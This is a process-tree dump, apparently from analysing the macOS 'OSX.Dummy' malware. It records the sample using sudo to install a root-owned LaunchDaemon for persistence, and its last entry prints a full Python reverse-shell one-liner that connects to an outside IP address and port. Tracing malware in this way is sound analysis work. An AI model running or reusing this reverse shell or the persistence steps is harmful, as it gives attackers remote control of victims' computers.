Dummy Process Tree
{
"process_name": "/Users/zingo123/Downloads/OSX.Dummy/script",
"pid": 2607,
"command_line_args": "./script",
"child_processes": [
{
"process_name": "/usr/bin/sudo",
"pid": 2608,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chown root /tmp/script.sh",
"child_processes": [
{
"process_name": "/usr/sbin/chown",
"pid": 2610,
"command_line_args": "chown root /tmp/script.sh"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2609,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2609,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2611,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chmod +x /tmp/script.sh",
"child_processes": [
{
"process_name": "/bin/chmod",
"pid": 2613,
"command_line_args": "chmod +x /tmp/script.sh"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2612,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2612,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2614,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/script.sh /var/root/",
"child_processes": [
{
"process_name": "/bin/mv",
"pid": 2617,
"command_line_args": "mv /tmp/script.sh /var/root/"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2615,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2615,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2616,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2616,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2618,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/com.startup.plist /Library/LaunchDaemons/",
"child_processes": [
{
"process_name": "/bin/mv",
"pid": 2621,
"command_line_args": "mv /tmp/com.startup.plist /Library/LaunchDaemons/"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2619,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2619,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2620,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2620,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2622,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2622,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2623,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chown root /Library/LaunchDaemons/com.startup.plist",
"child_processes": [
{
"process_name": "/usr/sbin/chown",
"pid": 2626,
"command_line_args": "chown root /Library/LaunchDaemons/com.startup.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2624,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2624,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2625,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2625,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2627,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# launchctl load -w /Library/LaunchDaemons/com.startup.plist",
"child_processes": [
{
"process_name": "/bin/launchctl",
"pid": 2629,
"command_line_args": "launchctl load -w /Library/LaunchDaemons/com.startup.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2628,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2628,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2630,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2630,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2633,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2633,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
}
]
}
{
"process_name": "/dev/console",
"pid": 2631,
"command_line_args": "xpcproxy com.startup",
"child_processes": [
{
"process_name": "/usr/bin/python",
"pid": 2632,
"command_line_args": "python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"185.243.115.230\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);"
}
]
}
